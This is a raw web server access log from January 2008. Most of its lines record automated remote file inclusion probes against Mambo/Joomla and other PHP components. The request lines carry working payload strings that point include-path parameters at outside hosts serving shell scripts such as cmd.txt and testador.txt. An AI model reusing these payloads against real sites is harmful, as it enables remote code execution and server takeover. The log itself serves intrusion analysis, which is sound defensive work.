74.208.68.211 - - [02/Jan/2008:04:02:41 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://84.244.5.78/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.217.130 - - [02/Jan/2008:04:04:58 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [02/Jan/2008:04:04:58 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [02/Jan/2008:04:04:58 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.68.211 - - [02/Jan/2008:04:10:04 -0800] "GET /logs/access_071224.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://84.244.5.78/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.68.211 - - [02/Jan/2008:04:10:04 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://84.244.5.78/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.212 - - [02/Jan/2008:04:12:20 -0800] "GET /?N=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.208.68.211 - - [02/Jan/2008:04:13:07 -0800] "GET /logs/access_071222.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://84.244.5.78/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [02/Jan/2008:04:17:24 -0800] "GET /logs/access_071224.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [02/Jan/2008:04:17:24 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [02/Jan/2008:04:17:24 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.144.90 - - [02/Jan/2008:04:19:27 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.144.90 - - [02/Jan/2008:04:19:27 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.144.90 - - [02/Jan/2008:04:19:27 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.144.90 - - [02/Jan/2008:04:19:38 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.144.90 - - [02/Jan/2008:04:19:38 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.144.90 - - [02/Jan/2008:04:19:38 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.159 - - [02/Jan/2008:04:20:58 -0800] "GET /plans/?M=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.67.231.247 - - [02/Jan/2008:04:22:26 -0800] "GET /logs/access_071222.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [02/Jan/2008:04:22:41 -0800] "GET /logs/access_071224.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [02/Jan/2008:04:22:41 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [02/Jan/2008:04:22:41 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.176.228.30 - - [02/Jan/2008:04:24:14 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
81.176.228.30 - - [02/Jan/2008:04:24:14 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
84.242.64.153 - - [02/Jan/2008:04:24:51 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.242.64.153 - - [02/Jan/2008:04:24:52 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
128.121.125.231 - - [02/Jan/2008:04:25:21 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.121.125.231 - - [02/Jan/2008:04:25:21 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.121.125.231 - - [02/Jan/2008:04:25:21 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.67.231.247 - - [02/Jan/2008:04:26:56 -0800] "GET /logs/access_071222.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:04:29:15 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:04:29:15 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:04:29:15 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:04:29:39 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/hearth_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:04:29:39 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/hearth_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:04:29:39 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/hearth_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.215.83 - - [02/Jan/2008:04:31:17 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
205.234.215.83 - - [02/Jan/2008:04:31:17 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.121.92.203 - - [02/Jan/2008:04:32:13 -0800] "GET /Neos_Chronos/header.php?base_folder=http://dnsmerlin.com/valley/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.232.68.17 - - [02/Jan/2008:04:32:36 -0800] "GET /Neos_Chronos/header.php?base_folder=http://www.solidscripts.co.uk/components/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [02/Jan/2008:04:36:01 -0800] "GET /logs/access_071220.log/Neos_Chronos/header.php?base_folder=http://www.solidscripts.co.uk/components/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [02/Jan/2008:04:36:02 -0800] "GET /logs/Neos_Chronos/header.php?base_folder=http://www.solidscripts.co.uk/components/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.198.130 - - [02/Jan/2008:04:36:27 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.198.130 - - [02/Jan/2008:04:36:27 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.198.130 - - [02/Jan/2008:04:36:27 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.232.68.17 - - [02/Jan/2008:04:37:12 -0800] "GET /logs/access_071222.log/Neos_Chronos/header.php?base_folder=http://www.solidscripts.co.uk/components/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.92.203 - - [02/Jan/2008:04:38:31 -0800] "GET /logs/access_071220.log/Neos_Chronos/header.php?base_folder=http://dnsmerlin.com/valley/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.92.203 - - [02/Jan/2008:04:38:31 -0800] "GET /logs/Neos_Chronos/header.php?base_folder=http://dnsmerlin.com/valley/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.92.203 - - [02/Jan/2008:04:39:05 -0800] "GET /logs/access_071222.log/Neos_Chronos/header.php?base_folder=http://dnsmerlin.com/valley/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.70.37.184 - - [02/Jan/2008:04:40:48 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Jyxobot/1" "www.dmulk.com"
195.70.37.184 - - [02/Jan/2008:04:41:00 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Jyxobot/1" "www.dmulk.com"
213.254.214.2 - - [02/Jan/2008:04:45:49 -0800] "GET /logs/access_071220.log/Neos_Chronos/header.php?base_folder=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.2 - - [02/Jan/2008:04:45:49 -0800] "GET /Neos_Chronos/header.php?base_folder=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.2 - - [02/Jan/2008:04:45:50 -0800] "GET /logs/Neos_Chronos/header.php?base_folder=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.2 - - [02/Jan/2008:04:46:24 -0800] "GET /logs/access_071222.log/Neos_Chronos/header.php?base_folder=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.232.68.17 - - [02/Jan/2008:04:48:37 -0800] "GET /Neos_Chronos/header.php?base_folder=http://www.solidscripts.co.uk/components/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [02/Jan/2008:04:49:39 -0800] "GET /backup/ HTTP/1.0" 401 395 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.47.199.89 - - [02/Jan/2008:04:50:34 -0800] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.199.89 - - [02/Jan/2008:04:50:34 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.199.89 - - [02/Jan/2008:04:50:34 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.199.89 - - [02/Jan/2008:04:50:47 -0800] "GET /logs/access_071222.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.232.68.17 - - [02/Jan/2008:04:51:56 -0800] "GET /logs/access_071220.log/Neos_Chronos/header.php?base_folder=http://www.solidscripts.co.uk/components/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [02/Jan/2008:04:51:56 -0800] "GET /logs/Neos_Chronos/header.php?base_folder=http://www.solidscripts.co.uk/components/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.200 - - [02/Jan/2008:04:52:21 -0800] "GET /plans/?S=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.232.68.17 - - [02/Jan/2008:04:52:46 -0800] "GET /logs/access_071222.log/Neos_Chronos/header.php?base_folder=http://www.solidscripts.co.uk/components/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:04:53:21 -0800] "GET /retreat1/IMG_2745.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:04:53:27 -0800] "GET /retreat1/IMG_2707.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
81.21.78.60 - - [02/Jan/2008:04:54:11 -0800] "GET /logs/access_071224.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [02/Jan/2008:04:54:11 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [02/Jan/2008:04:54:12 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.229.26.205 - - [02/Jan/2008:04:56:01 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=url%20shell? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.188.4 - - [02/Jan/2008:04:57:09 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.188.4 - - [02/Jan/2008:04:57:09 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.188.4 - - [02/Jan/2008:04:57:10 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.4.99 - - [02/Jan/2008:04:58:35 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://websolution365.com/test????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.4.99 - - [02/Jan/2008:04:58:35 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://websolution365.com/test????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.4.99 - - [02/Jan/2008:04:58:35 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://websolution365.com/test????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.79.202.178 - - [02/Jan/2008:04:59:48 -0800] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.79.202.178 - - [02/Jan/2008:04:59:48 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.79.202.178 - - [02/Jan/2008:04:59:48 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.149.218 - - [02/Jan/2008:05:00:02 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.149.218 - - [02/Jan/2008:05:00:02 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.149.218 - - [02/Jan/2008:05:00:03 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.4.99 - - [02/Jan/2008:05:00:36 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://websolution365.com/test????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.4.99 - - [02/Jan/2008:05:00:36 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://websolution365.com/test????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.4.99 - - [02/Jan/2008:05:00:37 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://websolution365.com/test????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.57.34 - - [02/Jan/2008:05:01:35 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [02/Jan/2008:05:01:35 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [02/Jan/2008:05:01:36 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.82 - - [02/Jan/2008:05:02:11 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.241.213.160 - - [02/Jan/2008:05:03:33 -0800] "GET /logs/access_071224.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.213.160 - - [02/Jan/2008:05:03:34 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.213.160 - - [02/Jan/2008:05:03:35 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.229.26.205 - - [02/Jan/2008:05:04:58 -0800] "GET /logs/access_071224.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=url%20shell? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.229.26.205 - - [02/Jan/2008:05:04:59 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=url%20shell? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [02/Jan/2008:05:05:51 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [02/Jan/2008:05:05:52 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [02/Jan/2008:05:05:52 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.27.212.248 - - [02/Jan/2008:05:06:10 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.27.212.248 - - [02/Jan/2008:05:06:10 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.27.212.248 - - [02/Jan/2008:05:06:11 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.79.215 - - [02/Jan/2008:05:06:14 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.79.215 - - [02/Jan/2008:05:06:14 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.79.215 - - [02/Jan/2008:05:06:14 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:05:07:03 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.149.218 - - [02/Jan/2008:05:07:12 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.149.218 - - [02/Jan/2008:05:07:12 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.149.218 - - [02/Jan/2008:05:07:12 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.198.17.13 - - [02/Jan/2008:05:08:01 -0800] "GET /logs/access_071224.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.tiboron.de/phpBB2/cache/lol.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.198.17.13 - - [02/Jan/2008:05:08:02 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.tiboron.de/phpBB2/cache/lol.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.198.17.13 - - [02/Jan/2008:05:08:02 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.tiboron.de/phpBB2/cache/lol.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
